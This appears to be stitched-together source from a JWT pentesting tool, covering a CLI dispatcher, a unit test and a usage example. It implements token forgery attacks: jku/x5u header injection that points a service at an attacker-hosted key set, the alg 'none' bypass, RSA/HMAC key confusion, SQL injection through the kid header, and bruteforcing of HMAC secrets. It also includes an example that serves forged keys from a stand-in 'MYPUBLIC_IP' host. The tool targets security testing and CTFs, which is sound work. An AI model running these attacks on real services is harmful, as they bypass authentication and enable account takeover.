def user_x5u_by_pass(jwt_json: Dict, url: str) -> None:
"""
Print for x5u bypass method.
Parameters
----------
jwt_json: Dict
your jwt json (use encode_to_json.Check Doc).
url: str
your url
"""
new_jwt = jku_vulnerability(
jwt=encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE],
url=url,
)
click.echo(NEW_JWT + new_jwt)
copy_to_clipboard(new_jwt)
click.echo(
f"Please run python -m http.server --bind {url} .Before send your jwt",
)
def test_jku_vulnerability(requests_mock):
"""
Test jku_vulnerability method in vulnerabilities.py
"""
with pytest.raises(InvalidJWT):
jku_vulnerability("", "http://test.com")
with pytest.raises(InvalidJWT):
jku_vulnerability(jwt_bruteforce, "http://test.com")
status_code = 200
requests_mock.get(
"http://localhost:8080",
json={
"keys": [
{
"kty":
"RSA",
"use":
"sig",
"kid":
"xxxxxxxxx",
"n":
"oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
"-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
"ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
"XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
"e":
"AQAB",
"alg":
"RS256",
},
],
},
status_code=status_code,
)
jwt = jku_vulnerability(jwt_jku, "http://test.com")
jwt_json = jwt_to_json(jwt)
assert "jku" in jwt_json[HEADER]
assert os.path.exists("jwk-python.json")
assert jwt_json[HEADER]["jku"] == "http://test.com/jwk-python.json"
jwt = jku_vulnerability(jwt_jku, "http://test.com", file="test")
jwt_json = jwt_to_json(jwt)
assert "jku" in jwt_json[HEADER]
assert os.path.exists("test.json")
assert jwt_json[HEADER]["jku"] == "http://test.com/test.json"
privatekey = OpenSSL.crypto.PKey()
privatekey.generate_key(OpenSSL.crypto.TYPE_RSA, 4096)
with open("private.pem", "w") as f:
f.write(
OpenSSL.crypto.dump_privatekey(
OpenSSL.crypto.FILETYPE_PEM,
privatekey,
).decode(), )
jku_vulnerability(
jwt_jku,
"http://test.com",
file="test",
pem="private.pem",
)
assert os.path.exists("private.pem")
def myjwt_cli(jwt, **kwargs):
"""
\b
This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Full documentation is at http://myjwt.readthedocs.io.
If you see problems or enhancement send an issue.I will respond as soon as possible.
Enjoy :)
All new jwt will be copy to the clipboard.
\f
Parameters
----------
jwt: str
your jwt
kwargs: Dict
all option value
"""
if not is_valid_jwt(jwt):
sys.exit(NOT_VALID_JWT)
# detect if some options are here
# if no option detected print user_interface
interface_mode = True
for option in kwargs.values():
if not (option is None or option == () or not option
or option == "GET"):
interface_mode = False
if interface_mode:
user_interface(jwt)
sys.exit()
if kwargs["bruteforce"]:
jwt_json = jwt_to_json(jwt)
if "HS" not in jwt_json[HEADER]["alg"]:
sys.exit(CHECK_DOCS)
key = bruteforce_wordlist(jwt, kwargs["bruteforce"])
if key == "":
sys.exit(NOT_CRAKED)
else:
copy_to_clipboard(key)
click.echo(CRACKED + key)
if (not kwargs["add_header"] and not kwargs["add_payload"]
and not kwargs["full_payload"]):
sys.exit()
if kwargs["add_payload"]:
payload_dict = dict()
for payload in kwargs["add_payload"]:
new_str = payload.split("=")
if len(new_str) != 2:
sys.exit(VALID_PAYLOAD)
payload_dict[new_str[0]] = new_str[1]
jwt_json = add_payload(jwt_to_json(jwt), payload_dict)
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
if kwargs["add_header"]:
header_dict = dict()
for header in kwargs["add_header"]:
new_str = header.split("=")
if len(new_str) != 2:
sys.exit(VALID_HEADER)
header_dict[new_str[0]] = new_str[1]
jwt_json = add_header(jwt_to_json(jwt), header_dict)
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
if kwargs["full_payload"]:
try:
jwt_json = change_payload(
jwt_to_json(jwt),
json.loads(kwargs["full_payload"]),
)
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
except JSONDecodeError:
sys.exit(VALID_PAYLOAD_JSON)
if kwargs["x5u"]:
jwt = x5u_vulnerability(
jwt,
url=kwargs["x5u"],
pem=kwargs["key"],
crt=kwargs["crt"],
file=kwargs["file"],
)
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
if kwargs["jku"]:
jwt = jku_vulnerability(
jwt,
kwargs["jku"],
kwargs["file"],
kwargs["key"],
)
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
click.echo(
f"Please run python -m http.server --bind {kwargs['jku']} .Before send your jwt",
)
if kwargs["kid"]:
jwt = inject_sql_kid(jwt, kwargs["kid"])
if not kwargs["sign"]:
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
if kwargs["hmac"]:
jwt = confusion_rsa_hmac(jwt, kwargs["hmac"])
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
if kwargs["none_vulnerability"]:
jwt_json = change_alg(jwt_to_json(jwt), "none")
jwt = encode_jwt(jwt_json) + "."
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
if kwargs["sign"]:
jwt_json = jwt_to_json(jwt)
if "HS" not in jwt_json[HEADER]["alg"]:
sys.exit(CHECK_DOCS)
jwt = signature(jwt_json, kwargs["sign"])
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
if kwargs["verify"]:
jwt_json = jwt_to_json(jwt)
if "HS" not in jwt_json[HEADER]["alg"]:
sys.exit(CHECK_DOCS)
new_jwt = signature(jwt_json, kwargs["verify"])
click.echo(
VALID_SIGNATURE if new_jwt.split(".")[2] == jwt.split(".")[2] else
INVALID_SIGNATURE, )
if kwargs["crack"]:
jwt_json = jwt_to_json(jwt)
if "HS" not in jwt_json[HEADER]["alg"]:
sys.exit(CHECK_DOCS)
all_string = list(exrex.generate(kwargs["crack"]))
click.echo(
kwargs["crack"] + " have " + str(len(all_string)) +
" possibilities", )
with click.progressbar(
all_string,
label="Keys",
length=len(all_string),
) as bar:
for key in bar:
new_jwt = signature(jwt_json, key)
if new_jwt.split(".")[2] == jwt.split(".")[2]:
copy_to_clipboard(key)
sys.exit("Key found: " + key)
sys.exit(INVALID_SIGNATURE)
if kwargs["url"]:
data_dict = dict()
for d in kwargs["data"]:
new_str = d.split("=")
if len(new_str) != 2:
sys.exit(VALID_DATA)
if new_str[1] == "MY_JWT":
data_dict[new_str[0]] = jwt
else:
data_dict[new_str[0]] = new_str[1]
cookies_dict = dict()
for cookie in kwargs["cookies"]:
new_str = cookie.split("=")
if len(new_str) != 2:
sys.exit(VALID_COOKIES)
if new_str[1] == "MY_JWT":
cookies_dict[new_str[0]] = jwt
else:
cookies_dict[new_str[0]] = new_str[1]
try:
response = send_jwt_to_url(
kwargs["url"],
kwargs["method"],
data_dict,
cookies_dict,
jwt,
)
click.echo(response.text)
except requests.exceptions.ConnectionError:
sys.exit("Connection Error. Verify your url.")
if kwargs["print"]:
copy_to_clipboard(jwt)
print_decoded(jwt)
if (not kwargs["none_vulnerability"] and not kwargs["hmac"]
and not kwargs["bruteforce"] and not kwargs["sign"]
and not kwargs["verify"] and not kwargs["jku"]
and not kwargs["x5u"] and not kwargs["print"]):
copy_to_clipboard(jwt)
click.echo(NEW_JWT + jwt)
sys.exit()
from myjwt.vulnerabilities import jku_vulnerability
jwt = (
"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9wdGwtMTc5OTRmNTAtMzI5NTg0MTYubGliY3VybC5zby8ud2VsbC1"
"rbm93bi8vandrcy5qc29uIn0.eyJ1c2VyIjoiYSJ9.e1oZ73Q95aYPcRfulEY--beuGEV2tE1W_FGHtH1ZlevC76lBVqbdM5PY1v6quuJWRtN"
"LwqDbUdydAH4lubgE0pwix-A7LqcD-b-0mNQkt9jXqBYCYBsZtGnvBFB9qHoK_CI39qLku1rOWkcEOcJYMSJFfxipImBb_AwoiXv-wmnpchTO"
"AY_PFOtXVXKHkoGQtEaMKfnRBXHAgyEAcqHCqvljWuMmdKVpyGNVaQBnKCEKkGyYLpdpL2UIZ3XNYy96JcGpm6LHvIXm6rEOkWoJl2j_07xVs"
"M2S__QzllRw_qezS5rzuYlRz-0j0nP_S5gSRcdrR4yNtSO3ivue5mR-RQ")
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
# optionals param file, pem (check documentation).
# this function will create a new json file for your new jwks (named: jwk-python.json)
print(jwt)
# don't forget to create a server before send your new jwt
# like python -m http.server --bind MYPUBLIC_IP 8080